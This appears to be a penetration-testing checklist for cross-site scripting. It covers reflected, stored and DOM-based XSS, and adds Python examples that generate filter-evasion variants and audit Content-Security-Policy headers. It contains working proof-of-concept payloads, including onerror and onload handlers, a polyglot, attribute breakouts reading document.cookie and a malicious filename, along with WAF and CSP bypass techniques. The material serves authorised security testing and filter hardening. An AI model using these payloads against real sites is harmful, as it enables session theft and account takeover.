1. Basic XSS Testing

    • Try XSS using QuickXSS tool by theinfosecguy.
    • Upload file using '><img src=x onerror=alert(document.domain)>.txt.
    • If <script> is blocked, try other tags: a harmless tag such as <h1> confirms that raw HTML is injected, and a tag with an event handler (<img src=x onerror=alert(1)>, <svg onload=alert(1)>) executes without any <script> element.
    • If the input is reflected inside a <script> block as the value of a variable, close the enclosing string and statement before the call, e.g. ';alert(1);// when the value is single-quoted, so that alert(1) runs as a statement of its own.
    • If double quotes (") are filtered, use this payload: /><img src=d onerror=confirm(/tushar/);>. It contains no quote characters at all; the regular-expression literal /tushar/ stands in for a quoted string.
    • Upload an image-type file that carries a JavaScript payload (an SVG with an embedded <script> element is the usual case) and check whether the application serves it back inline with an HTML or SVG Content-Type rather than as a download.
    • Change method from POST to GET to bypass filters sometimes.
  2. Tag Attribute Value

    • If input lands in an attribute value (e.g., <input type="text" name="state" value="INPUT_FROM_USER">), close the value and add an event handler, e.g. " autofocus onfocus="alert(document.cookie)". The autofocus attribute makes onfocus fire on page load; without it the handler only runs when the user clicks into the field. If the quote character the attribute uses is filtered, no breakout is possible from that position.
  3. Syntax Encoding

    • URL-encode (percent-encode) the payload, e.g. %3cscript%3ealert(document.cookie)%3c/script%3e, to get past filters that inspect the raw parameter without decoding it first.
  4. XSS Filter Evasion

    • Replace < and > with the HTML entities &lt; and &gt;. Browsers only decode entities inside attribute values (useful for a javascript: URL in href or code in an event handler, e.g. alert&lpar;1&rpar;); in a text node &lt;script&gt; is displayed as literal text, so entity-encoded angle brackets only execute if some server-side stage decodes them back before output.
    • Use an XSS polyglot, e.g., javascript:/*-></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>.
  5. XSS Firewall Bypass

    • Check whether the filter is case-sensitive: if only lowercase keywords are blocked, mixed case such as <ScRiPt> or oNeRrOr works, because HTML tag and attribute names are case-insensitive.
    • Break the firewall regex with a new line (\r\n) in place of the space between tag name and attributes; the HTML tokenizer treats CR and LF as separators, but a pattern written with a literal space, or with . and no DOTALL flag, stops matching.
    • Try double URL encoding (%253C for <) in case the filter decodes once and a later component decodes again.
    • Test for recursive filters: a filter that strips a blocked keyword in a single pass is defeated by nesting, e.g. <scr<script>ipt> becomes <script> once the inner copy is removed.
    • Inject anchor (or other) tags without whitespace, using / as the separator, e.g. <a/href=javascript:alert(1)>x</a>.
    • Replace whitespace between attributes with /, tab, LF or FF, the only separators the HTML tokenizer accepts; other characters such as bullets (•) become part of the attribute name and do not work.
    • Change the request method (GET to POST or back); the firewall rule may inspect only one of them.
  6. Test For Reflected Cross Site Scripting

    • Check whether the characters <, >, ', ", and & are filtered or encoded in the response.
    • Test with character escape sequences (\x3c, \u003c) where the reflection lands inside a JavaScript string.
    • Replace < and > with the HTML entities &lt; and &gt;; this executes only where the entities are decoded, i.e. inside an attribute value (a javascript: URL or event-handler code) or when a later server-side stage decodes them. In a text node &lt;script&gt; is displayed, not parsed.
    • Test payloads in lower, upper and mixed case.
    • Break the firewall regex with a new line (\r\n) in place of the space before an attribute.
    • Use double URL encoding (%253C).
    • Test for recursive filters by nesting the blocked keyword inside itself (<scr<script>ipt>).
    • Inject anchor tags without whitespace (<a/href=...>).
    • Replace whitespace between attributes with / (bullets and other non-ASCII characters are not separators for the HTML tokenizer).
    • Change HTTP methods.
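
Sections 4 to 6 list evasions that each defeat a specific filter weakness: case sensitivity, single decoding, a pattern anchored on a literal space, and one-pass keyword stripping. The example below, added here and not taken from the original page, generates those variants from one payload and runs them against three constructed filters: a naive blocklist with all of those weaknesses, a one-pass keyword stripper, and a filter that normalizes its input first. The base payload and the filters are assumptions for illustration; the normalizing filter models the best case for the attacker, where a downstream stage decodes whatever the filter left encoded.

```python
"""Filter-evasion variants of one payload, run against a naive blocklist,
a strip-once sanitizer and a normalizing filter.

Added example for sections 4-6 of this checklist, not code from the
original page.  BASE and the three filters are constructed for
illustration; the naive ones deliberately have the weaknesses those
sections probe.
"""
import re
from urllib.parse import quote, unquote

BASE = "<img src=x onerror=alert(document.domain)>"


def mixed_case(p: str) -> str:
    """Alternate the case of tag and attribute names only (case-insensitive
    in HTML); the JavaScript after '=' must stay intact."""
    name = re.compile(r"(?<=[<\s/])\w+(?=[\s=>/])")
    return name.sub(lambda m: "".join(c.upper() if i % 2 == 0 else c
                                      for i, c in enumerate(m.group())), p)


def slash_separators(p: str) -> str:
    """/ is a valid separator between attributes, so no whitespace is needed."""
    return p.replace(" ", "/")


def crlf_separators(p: str) -> str:
    """CR/LF are separators too; a pattern with a literal space stops matching."""
    return p.replace(" ", "\r\n")


def double_encode(p: str) -> str:
    """%253C for <: survives a single decode if a later stage decodes again."""
    return quote(quote(p, safe=""), safe="")


def recursive_bait(p: str, word: str = "onerror") -> str:
    """Wrap a copy of the blocked keyword inside itself; a one-pass stripper
    reassembles the original when it removes the inner copy."""
    return p.replace(word, word[:3] + word + word[3:])


def naive_blocklist(raw: str) -> bool:
    """Constructed weak filter: single URL decode, case-sensitive,
    space-anchored.  True means the request is blocked."""
    return re.search(r"<script|<img src", unquote(raw)) is not None


def strip_once(raw: str, word: str = "onerror") -> str:
    """Constructed one-pass sanitizer: removes every occurrence of word but
    never re-examines what the removal produced."""
    return raw.replace(word, "")


def strip_recursive(raw: str, word: str = "onerror") -> str:
    """Repeat until the output stops changing."""
    while word in raw:
        raw = raw.replace(word, "")
    return raw


def normalize(raw: str) -> str:
    """Decode until stable, collapse whitespace and / to one space, lowercase:
    roughly what the tokenizer sees for tag and attribute names, assuming a
    downstream stage decodes what the filter left encoded."""
    prev = None
    while prev != raw:
        prev, raw = raw, unquote(raw)
    return re.sub(r"[\s/]+", " ", raw).lower()


def hardened_blocklist(raw: str) -> bool:
    """Same intent as naive_blocklist, but matched against the normalized form
    and flagging any tag with an on* handler, not one fixed spelling."""
    return re.search(r"<(script|\w+ [^>]*\bon\w+=)", normalize(raw)) is not None


VARIANTS = {
    "mixed_case": mixed_case(BASE),
    "slash": slash_separators(BASE),
    "crlf": crlf_separators(BASE),
    "double_encoded": double_encode(BASE),
}

if __name__ == "__main__":
    print(f"{'variant':15} naive  hardened")
    print(f"{'base':15} {naive_blocklist(BASE)!s:6} {hardened_blocklist(BASE)}")
    for name, v in VARIANTS.items():
        print(f"{name:15} {naive_blocklist(v)!s:6} {hardened_blocklist(v)}")
    bait = recursive_bait(BASE)
    print("strip once   :", strip_once(bait))        # handler survives
    print("strip recurse:", strip_recursive(bait))   # handler gone
```

Every variant passes the naive blocklist while the normalized form is identical to the base payload, which is the check to run before reporting a bypass: if normalize() of the mutated request no longer contains a handler, the mutation broke the payload rather than the filter.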
  7. Test For Stored Cross Site Scripting

    • Identify inputs that are stored server-side and later rendered on the client, to the same user or to others (other users' sessions and admin views are the higher-impact case).
    • Look for input parameters on the profile page.
    • Look for input parameters on the shopping cart page.
    • Look for input parameters on the file upload page.
    • Look for input parameters on the settings page.
    • Look for input parameters on the forum or comment page.
    • Test uploading a file whose name is an XSS payload, e.g. '><img src=x onerror=alert(document.domain)>.txt; file names are often rendered unescaped in listings and upload confirmations.
    • Test with HTML tags in various input fields.
  8. Advanced XSS Testing

    • Test for DOM-based XSS by reading the JavaScript that handles user input: trace sources such as location.hash, location.search, document.referrer and postMessage data to sinks such as innerHTML, document.write, eval and jQuery's html().
    • Check for XSS in third-party widgets and plugins.
    • Test XSS in email fields by injecting payloads that can be executed in email clients.
    • Test for XSS in mobile applications that render content in a WebView, where a JavaScript bridge (e.g. addJavascriptInterface on Android) can raise the impact beyond the page itself.
    • Verify if Content Security Policy (CSP) headers are in place and effective.
    • Use CSP bypass techniques where CSP is implemented but not correctly configured.
    • Test for XSS via JSONP endpoints: a callback parameter reflected into a script response can be abused directly, and a JSONP endpoint on an origin the CSP allowlists is a standard way around an otherwise strict policy.
    • Check if XSS can be triggered in different browser contexts (e.g., Chrome, Firefox, Edge).
    • Test for reflected and stored XSS in multi-step forms and wizards.
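
Checking that a CSP header is present takes one request; checking that it is effective is where the findings are. The evaluator below is an added example, not the page's own tooling, that parses a Content-Security-Policy value and reports the conditions under which injected script still runs: 'unsafe-inline' with no nonce or hash, broad sources, a host allowlist without 'strict-dynamic' (the JSONP case from this section), and missing object-src or base-uri. The two sample policies are constructed for illustration.

```python
"""Flag CSP configurations that leave script injection exploitable.

Added example for section 8 of this checklist, not code from the original
page.  WEAK and STRICT are constructed sample policies.
"""
from typing import Dict, List

WEAK = "default-src 'self'; script-src 'self' 'unsafe-inline' https://cdn.example.com"
STRICT = ("default-src 'none'; script-src 'nonce-r4nd0mV4lu3' 'strict-dynamic'; "
          "object-src 'none'; base-uri 'none'")


def parse_csp(header: str) -> Dict[str, List[str]]:
    """Split a Content-Security-Policy value into {directive: [sources]}."""
    policy: Dict[str, List[str]] = {}
    for directive in header.split(";"):
        parts = directive.strip().split()
        if parts:
            policy[parts[0].lower()] = parts[1:]
    return policy


def csp_findings(header: str) -> List[str]:
    """Return the reasons this policy does not stop script injection.
    An empty list means none of the checked weaknesses is present."""
    p = parse_csp(header)
    findings: List[str] = []
    # script-src falls back to default-src; with neither, scripts are unrestricted.
    script = p.get("script-src", p.get("default-src"))
    if script is None:
        return ["no script-src and no default-src: scripts are not restricted at all"]
    src = [s.lower() for s in script]

    # A nonce or hash makes browsers ignore 'unsafe-inline'; without one,
    # every injected <script> and on* handler executes.
    nonce_or_hash = any(s.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-"))
                        for s in src)
    if "'unsafe-inline'" in src and not nonce_or_hash:
        findings.append("'unsafe-inline' without a nonce or hash: injected <script> and on* handlers run")
    if "'unsafe-eval'" in src:
        findings.append("'unsafe-eval': injected strings that reach eval()/Function() execute")
    for s in src:
        if s in ("*", "http:", "https:", "data:") or s.startswith("*."):
            findings.append(f"overly broad script source {s}: the payload can be loaded from there")

    # An allowlist ('self' or named hosts) is only as safe as every script on
    # those origins; a JSONP endpoint or user-uploaded file there runs as
    # allowed script unless 'strict-dynamic' disables the allowlist.
    allowlist = [s for s in src if not s.startswith("'") or s == "'self'"]
    if allowlist and "'strict-dynamic'" not in src:
        findings.append("allowlist without 'strict-dynamic': a JSONP endpoint or uploaded file on an allowed origin bypasses the policy")

    # object-src falls back to default-src; base-uri does not fall back at all.
    if "object-src" not in p and "default-src" not in p:
        findings.append("object-src unrestricted: <object>/<embed> can load plugin content")
    if "base-uri" not in p:
        findings.append("base-uri missing: an injected <base href> redirects relative script URLs")
    return findings


if __name__ == "__main__":
    for label, policy in (("WEAK", WEAK), ("STRICT", STRICT)):
        print(label)
        for f in csp_findings(policy) or ["no findings"]:
            print("  -", f)
```

Feed it the header from a real response; a policy that returns no findings still has to be verified in the browser, because the check only covers the script-execution directives, not the rest of the policy.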